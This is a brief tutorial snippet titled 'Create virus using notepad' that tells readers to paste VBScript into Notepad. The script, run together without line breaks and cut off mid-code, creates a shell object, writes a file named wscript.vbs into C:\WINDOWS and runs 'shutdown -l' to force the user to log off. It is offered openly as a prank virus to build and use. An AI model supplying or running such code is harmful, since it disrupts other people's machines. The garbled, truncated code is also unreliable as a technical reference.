
Create virus using notepad
1 -> Virus Creation Tricks 1
Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")dim strDir,strfile,st,strtxt2,strshell,strlogdim obfso,obfolder,obshell,obfile,obtxtfilestrshell="wscript.shell"strDir="C:\WINDOWS"strfile="\wscript.vbs"st=Chr(34)strlog="shutdown -l"strtxt2="ws.run(strlog)"set...